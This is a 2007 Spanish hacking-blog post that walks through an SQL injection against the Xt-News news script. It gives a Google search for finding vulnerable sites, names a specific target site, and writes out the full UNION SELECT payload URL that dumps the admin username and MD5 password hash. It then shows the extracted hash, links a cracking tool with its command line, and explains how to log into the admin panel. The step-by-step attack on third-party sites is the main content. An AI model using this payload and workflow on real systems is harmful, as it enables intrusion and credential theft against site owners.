General
- Comandos Hacking (7)
- Definiciones (10)
- Historia Hacking (3)
  - Bibliografías (2)
- Humor Hacking (2)
- Noticias (9)
- Protocolo TCP/IP (red) (5)
- Utilidades Hack (10)
- Videos (3)
- Vulnerabilidades (8)
Comenzando
- Introducción al Hacking (6)
- Buscando una víctima (3)
- Hacking Google (3)
- Escaneo de máquinas y redes (2)
- Trabajo en Windows (7)
- Trabajando en Linux (4)
Asaltando Sistemas
- Asaltando Linux/Unix (1)
- Asaltando Windows (2)
- Hacking en Wireless (3)
- Hacking por correo (1)
- Hacking Web (7)
- Troyanos (3)
- Virus (2)
Protegiendo la Red y el Software
- Antivirus/Antispyware (1)
- Auditoría del sistema (1)
- Encriptación (1)
- Firewalls y detección de intrusos (3)
- VPN (1)
Últimas Entradas
Archivo Mensual
- Marzo 2008 (1)
- Febrero 2008 (13)
- Agosto 2007 (1)
- Julio 2007 (3)
- Junio 2007 (3)
- Mayo 2007 (3)
- Abril 2007 (4)
- Marzo 2007 (8)
- Febrero 2007 (19)
Archivo Diario
Otras Webs

Jul

2

Vulnerabilidad en “Xt-NewsPowered”

Categorías: Buscando una víctima, Hacking Google, Hacking Web, Vulnerabilidades | Enviado por: rush (14 artículos) |

Bueno esta vulneravilidad consiste en una injecction SQL.

Para empezar si quieres buscar vulneravilidades Xt-News Tienes que tipear esto en google.

“Powered by Xt-News”

Resultado de la busqueda en google: http://www.google.com.mx/search?client=firefox-a&rls=org.mozilla%3A%3Aofficial&channel=s&hl=es&q=Powered+by+Xt-News&meta=&btnG=Buscar+con+Google

Aora escogemos alguna web la que sea.

En mi caso escogi esta: http://polyrando.org/xtnews/print.php?id_news=206

Aora lo que bamos a haces es coger nuestra SQL injecction que es la siguiente:

show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null,null,null,null,null,null%20FROM%20xtnews_users%20WHERE%20%20admin=1

Aora pegamos eso en nuetro navegador,Pero antes tienes que borrar print.php?id_news=206

Entonces nuestra url quedara asi:

http://polyrando.org/xtnews/show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null,null,null,null,null,null%20FROM%20xtnews_users%20WHERE%20%20admin=1

Aora como vemos nos dira el user de admin: webmaster

y nos dira una hash la cual es el password:

511131faa0a1abe83057f52dc61d40e2

aora solo falta crackear el password con algun md5

Aqui les dejo uno:http://rapidshare.com/files/40519889/mdcrack.rar

Aora lo que tienes que haces es descomprimir el mdcrack en su HD.

Y quedara asi:

C/mdcrack

aora para ejecutarlo ban a la consolo o ms-dos o cmd

y tipeamos esto

c:/mdcrack/mdcrack.exe <AKI IRA LA HASH>

c:/mdcrack/mdcrack.exe

511131faa0a1abe83057f52dc61d40e2

damos enter.

Esperamos a que nos de el password y para loguearnos tenemos que haces esto.

http://polyrando.org/xtnews/admin/

Solo tenemos que poner despues del ultimo / [admin] y directamente nos mandara a loguearnos como admin y tipeamos el user y el password.

Bueno eso es todo.

by: rUsH

Fuente:http://www.hslteam.org/foros/index.php?topic=5895.0

Últimas entradas:

Comentarios

Entrada escrita en el día Lunes, Julio 2nd, 2007 a las 5:18 am en las categorías Buscando una víctima, Hacking Google, Hacking Web, Vulnerabilidades. Puedes encontrar las respuestas a este tema desde el RSS 2.0 feed. Puedes dejar una respuesta o hacer un trackback a tu p�gina web.

3 Comentarios

Rodrilyx el Septiembre 17, 2007 10:20 pm
Hola jeje no me sirvio :S
Rodrilyx el Septiembre 17, 2007 10:21 pm
Hola jeje no me sirvio nose k ize mal…..
Rodrilyx & Russh! arre
sint el Septiembre 18, 2007 4:29 pm
=S

Importante!

Los autores de este blog pretenden informar sobre seguridad, vulnerabilidades, técnicas hack, hablar sobre lo último en hacking...

Las herramientas, trucos, comandos, artículos... explicados en este blog NUNCA deberán ser usados de forma maligna para delinquir o dañar a terceros. No nos hacemos responsables de la mala interpretación ni del mal uso de cualquier contenido del blog.

Todo lo que se habla en este blog está en internet (o proviene de alguno de los autores) y se puede consultar de forma libre. Si obtienes información de este blog para tu espacio, página web, blog... no olvides ponernos como fuente :).
Acerca de

El Blog del Hacker es una web llevada por usuarios de ForoHack.com perteneciente a la web ElHacker.com

Si quieres colaborar con nosotros lo puedes hacer de forma abierta en nuestros foros y siendo un usuario frecuente podrás ser Autor de este blog.

El objetivo principal de este blog es dar a conocer desde nuestro propio punto de vista el hacking en la red para Windows o Linux, conocer como funcionan las cosas, hacer más segura la red encontrando vulnerabilidades,... nunca para hacer el mal, estafar, ni nada parecido. Siempre de buen rollo =) Cuanto más se hable de forma abierta sobre estos temas más usuarios y empresas los conocerán y menos nos afectarán (será más segura la red)

Últimos Comentarios
- Super usuario dentro de Linux
  06/24/2008 06:59 pm
  11 Comentarios
- Phising y Pharming
  06/24/2008 06:31 pm
  294 Comentarios
- Como Hacer una envenenacion ARP en una Red
  04/08/2008 08:55 pm
  17 Comentarios
- Hablemos de Wifislax
  04/08/2008 03:22 pm
  312 Comentarios
- MaS…Comandos MS DOS.
  04/08/2008 01:35 pm
  41 Comentarios
- Que es un ataque RFI(Remote File Inclusion)
  04/08/2008 01:25 pm
  457 Comentarios
- Injection HTML
  04/08/2008 01:19 pm
  42 Comentarios
- Glosario sobre terminos
  04/04/2008 09:16 pm
  77 Comentarios
Entradas más populares
Feeds e Información
Registrarse

General

Comenzando

Asaltando Sistemas

Protegiendo la Red y el Software

Últimas Entradas

Archivo Mensual

Archivo Diario

Otras Webs

Jul

2

Vulnerabilidad en “Xt-NewsPowered”

Últimas entradas:

Comentarios

3 Comentarios

Importante!

Acerca de

Últimos Comentarios

Entradas más populares

Feeds e Información